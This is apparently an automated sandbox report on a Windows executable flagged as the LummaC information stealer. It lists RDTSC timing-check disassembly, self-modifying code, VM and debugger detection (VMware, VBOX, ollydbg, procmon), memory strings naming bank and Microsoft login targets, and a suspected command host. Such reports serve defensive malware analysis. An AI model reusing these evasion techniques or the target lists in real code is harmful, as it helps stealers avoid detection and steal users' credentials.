                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 4ED030F second address: 4ED0327 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F909CBB3524h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 4ED0327 second address: 4ED032B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 4ED032B second address: 4ED033B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lea eax, dword ptr [ebp-2Ch] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 4ED033B second address: 4ED0344 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ax, 6C95h 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 4ED0344 second address: 4ED034A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 4ED034A second address: 4ED0364 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F909C7BD30Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push ecx 0x00000010 pop edx 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 4ED0364 second address: 4ED0371 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 4ED0371 second address: 4ED0375 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 4ED0375 second address: 4ED037B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 4ED037B second address: 4ED0381 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 4ED0381 second address: 4ED0385 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 4ED0385 second address: 4ED03B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F909C7BD30Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F909C7BD315h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 4ED03B2 second address: 4ED0407 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F909CBB3527h 0x00000008 pop ecx 0x00000009 mov bx, B5CCh 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov ah, bl 0x00000014 popad 0x00000015 mov dword ptr [esp], eax 0x00000018 jmp 00007F909CBB3524h 0x0000001d xchg eax, ebx 0x0000001e jmp 00007F909CBB3520h 0x00000023 push eax 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 4ED0407 second address: 4ED0411 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov esi, 58533519h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 4ED0411 second address: 4ED0417 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 4ED0417 second address: 4ED041B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 4ED0470 second address: 4ED0474 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 4ED0474 second address: 4ED047A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 4ED047A second address: 4EC079E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F909CBB3524h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b jmp 00007F909CBB3520h 0x00000010 je 00007F910D7816C7h 0x00000016 xor eax, eax 0x00000018 jmp 00007F909CB8CC4Ah 0x0000001d pop esi 0x0000001e pop edi 0x0000001f pop ebx 0x00000020 leave 0x00000021 retn 0004h 0x00000024 nop 0x00000025 sub esp, 04h 0x00000028 mov esi, eax 0x0000002a xor ebx, ebx 0x0000002c cmp esi, 00000000h 0x0000002f je 00007F909CBB3655h 0x00000035 call 00007F90A165FCBDh 0x0000003a mov edi, edi 0x0000003c pushad 0x0000003d mov di, ax 0x00000040 pushfd 0x00000041 jmp 00007F909CBB351Ch 0x00000046 sbb ax, 8928h 0x0000004b jmp 00007F909CBB351Bh 0x00000050 popfd 0x00000051 popad 0x00000052 xchg eax, ebp 0x00000053 push eax 0x00000054 push edx 0x00000055 jmp 00007F909CBB3525h 0x0000005a rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 4EC079E second address: 4EC07AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F909C7BD30Ch 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 4EC07AE second address: 4EC07C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov bl, ah 0x0000000c popad 0x0000000d xchg eax, ebp 0x0000000e pushad 0x0000000f push ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 4EC07C0 second address: 4EC0801 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push esi 0x00000006 mov edx, 60A27E2Ch 0x0000000b pop edi 0x0000000c popad 0x0000000d mov ebp, esp 0x0000000f jmp 00007F909C7BD310h 0x00000014 xchg eax, ecx 0x00000015 jmp 00007F909C7BD310h 0x0000001a push eax 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F909C7BD30Eh 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 4EC0801 second address: 4EC0817 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, ebx 0x00000005 mov si, bx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f movzx eax, bx 0x00000012 mov cx, dx 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 4ED09CD second address: 4ED0A15 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F909C7BD315h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov bx, si 0x0000000e jmp 00007F909C7BD318h 0x00000013 popad 0x00000014 push eax 0x00000015 pushad 0x00000016 push esi 0x00000017 mov edi, 4C53E56Eh 0x0000001c pop edi 0x0000001d popad 0x0000001e xchg eax, ebp 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 4ED0A15 second address: 4ED0A19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 4ED0A19 second address: 4ED0A1F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 4ED0A1F second address: 4ED0A25 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 4ED0A25 second address: 4ED0A29 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 4ED0A29 second address: 4ED0A48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F909CBB3523h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 4ED0A48 second address: 4ED0A97 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F909C7BD319h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [75AF459Ch], 05h 0x00000010 jmp 00007F909C7BD30Eh 0x00000015 je 00007F910D37B28Bh 0x0000001b jmp 00007F909C7BD310h 0x00000020 pop ebp 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 4ED0A97 second address: 4ED0A9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 4ED0A9B second address: 4ED0AA1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 4ED0B60 second address: 4ED0B9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov dl, 01h 0x00000006 popad 0x00000007 popad 0x00000008 test al, al 0x0000000a pushad 0x0000000b mov bl, cl 0x0000000d push eax 0x0000000e push edx 0x0000000f pushfd 0x00000010 jmp 00007F909CBB351Fh 0x00000015 sbb esi, 038D567Eh 0x0000001b jmp 00007F909CBB3529h 0x00000020 popfd 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 4ED0B9F second address: 4ED0BD7 instructions: 0x00000000 rdtsc 0x00000002 mov dh, ch 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 je 00007F910D3710E5h 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 mov si, 3ADBh 0x00000014 pushfd 0x00000015 jmp 00007F909C7BD310h 0x0000001a sub eax, 5516B0A8h 0x00000020 jmp 00007F909C7BD30Bh 0x00000025 popfd 0x00000026 popad 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 4EE09A5 second address: 4EE09D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F909CBB3529h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F909CBB351Eh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 4EE09D9 second address: 4EE09DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 4EE09DE second address: 4EE0A31 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F909CBB351Fh 0x00000009 sbb esi, 67E5795Eh 0x0000000f jmp 00007F909CBB3529h 0x00000014 popfd 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, ebp 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F909CBB3526h 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 4EE0A31 second address: 4EE0A35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 4EE0A35 second address: 4EE0A3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 4EE0A3B second address: 4EE0A4C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F909C7BD30Dh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 4EE0A4C second address: 4EE0AF7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F909CBB3521h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e call 00007F909CBB351Ch 0x00000013 pushfd 0x00000014 jmp 00007F909CBB3522h 0x00000019 jmp 00007F909CBB3525h 0x0000001e popfd 0x0000001f pop esi 0x00000020 popad 0x00000021 xchg eax, esi 0x00000022 pushad 0x00000023 movzx esi, di 0x00000026 jmp 00007F909CBB3525h 0x0000002b popad 0x0000002c push eax 0x0000002d jmp 00007F909CBB3521h 0x00000032 xchg eax, esi 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 pushfd 0x00000037 jmp 00007F909CBB3526h 0x0000003c or cx, B068h 0x00000041 jmp 00007F909CBB351Bh 0x00000046 popfd 0x00000047 popad 0x00000048 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 4EE0AF7 second address: 4EE0B8D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F909C7BD319h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, dword ptr [ebp+0Ch] 0x0000000c jmp 00007F909C7BD30Eh 0x00000011 test esi, esi 0x00000013 jmp 00007F909C7BD310h 0x00000018 je 00007F910D36AB86h 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007F909C7BD30Eh 0x00000025 adc esi, 1F490858h 0x0000002b jmp 00007F909C7BD30Bh 0x00000030 popfd 0x00000031 mov si, 490Fh 0x00000035 popad 0x00000036 cmp dword ptr [75AF459Ch], 05h 0x0000003d jmp 00007F909C7BD312h 0x00000042 je 00007F910D382C20h 0x00000048 pushad 0x00000049 mov edi, ecx 0x0000004b pushad 0x0000004c mov cx, 7AEFh 0x00000050 push eax 0x00000051 push edx 0x00000052 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 4EE0B8D second address: 4EE0B9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 xchg eax, esi 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a mov cl, bh 0x0000000c mov dh, al 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 4EE0C3F second address: 4EE0C5A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F909C7BD317h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 4EE0C5A second address: 4EE0C89 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F909CBB3529h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F909CBB351Dh 0x00000013 rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeSpecial instruction interceptor: First address: 5E04C4 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeSpecial instruction interceptor: First address: 4386D1 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeSpecial instruction interceptor: First address: 66DBBF instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exe TID: 4820Thread sleep time: -180000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exe TID: 3304Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: AaEBZ7icLd.exe, 00000000.00000002.2352086086.00000000005C2000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: AaEBZ7icLd.exe, 00000000.00000003.2223659632.000000000585A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                Source: AaEBZ7icLd.exe, 00000000.00000003.2223659632.000000000585A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
                Source: AaEBZ7icLd.exe, 00000000.00000003.2223659632.000000000585A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                Source: AaEBZ7icLd.exe, 00000000.00000003.2223659632.000000000585A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                Source: AaEBZ7icLd.exe, 00000000.00000002.2352761941.0000000001049000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp
                Source: AaEBZ7icLd.exe, 00000000.00000003.2223659632.0000000005860000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696428655p
                Source: AaEBZ7icLd.exe, 00000000.00000003.2223659632.000000000585A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
                Source: AaEBZ7icLd.exe, 00000000.00000003.2223659632.000000000585A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                Source: AaEBZ7icLd.exe, AaEBZ7icLd.exe, 00000000.00000003.2276687938.0000000001084000.00000004.00000020.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2277706743.0000000001084000.00000004.00000020.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2279207879.0000000001084000.00000004.00000020.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2278490614.0000000001084000.00000004.00000020.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2277354845.0000000001084000.00000004.00000020.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2277010991.0000000001084000.00000004.00000020.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2278839639.0000000001084000.00000004.00000020.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2276143171.0000000001084000.00000004.00000020.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2279332488.0000000001084000.00000004.00000020.00020000.00000000.sdmp, AaEBZ7icLd.exe, 00000000.00000003.2279861456.0000000001084000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: AaEBZ7icLd.exe, 00000000.00000003.2223659632.000000000585A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                Source: AaEBZ7icLd.exe, 00000000.00000003.2223659632.000000000585A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                Source: AaEBZ7icLd.exe, 00000000.00000003.2223659632.000000000585A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                Source: AaEBZ7icLd.exe, 00000000.00000003.2223659632.000000000585A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                Source: AaEBZ7icLd.exe, 00000000.00000003.2223659632.000000000585A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                Source: AaEBZ7icLd.exe, 00000000.00000003.2223659632.000000000585A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                Source: AaEBZ7icLd.exe, 00000000.00000003.2223659632.000000000585A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                Source: AaEBZ7icLd.exe, 00000000.00000003.2223659632.000000000585A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
                Source: AaEBZ7icLd.exe, 00000000.00000003.2223659632.000000000585A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                Source: AaEBZ7icLd.exe, 00000000.00000003.2223659632.000000000585A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                Source: AaEBZ7icLd.exe, 00000000.00000003.2223659632.000000000585A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
                Source: AaEBZ7icLd.exe, 00000000.00000003.2223659632.000000000585A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                Source: AaEBZ7icLd.exe, 00000000.00000003.2223659632.000000000585A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
                Source: AaEBZ7icLd.exe, 00000000.00000003.2223659632.000000000585A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
                Source: AaEBZ7icLd.exe, 00000000.00000003.2223659632.000000000585A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
                Source: AaEBZ7icLd.exe, 00000000.00000003.2223659632.000000000585A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                Source: AaEBZ7icLd.exe, 00000000.00000003.2223659632.000000000585A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                Source: AaEBZ7icLd.exe, 00000000.00000003.2223659632.000000000585A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
                Source: AaEBZ7icLd.exe, 00000000.00000003.2223659632.000000000585A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                Source: AaEBZ7icLd.exe, 00000000.00000003.2223659632.000000000585A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
                Source: AaEBZ7icLd.exe, 00000000.00000003.2223659632.000000000585A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                Source: AaEBZ7icLd.exe, 00000000.00000003.2223659632.0000000005860000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: YNVMware
                Source: AaEBZ7icLd.exe, 00000000.00000003.2223659632.000000000585A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                Source: AaEBZ7icLd.exe, 00000000.00000003.2223659632.000000000585A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
                Source: AaEBZ7icLd.exe, 00000000.00000002.2352086086.00000000005C2000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: AaEBZ7icLd.exe, 00000000.00000003.2223659632.000000000585A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                Source: AaEBZ7icLd.exe, 00000000.00000003.2223659632.000000000585A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: SICE
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeProcess queried: DebugPortJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                LummaC encrypted strings found
                Source: AaEBZ7icLd.exe, 00000000.00000003.2149140099.0000000004D20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: hummskitnj.buzz
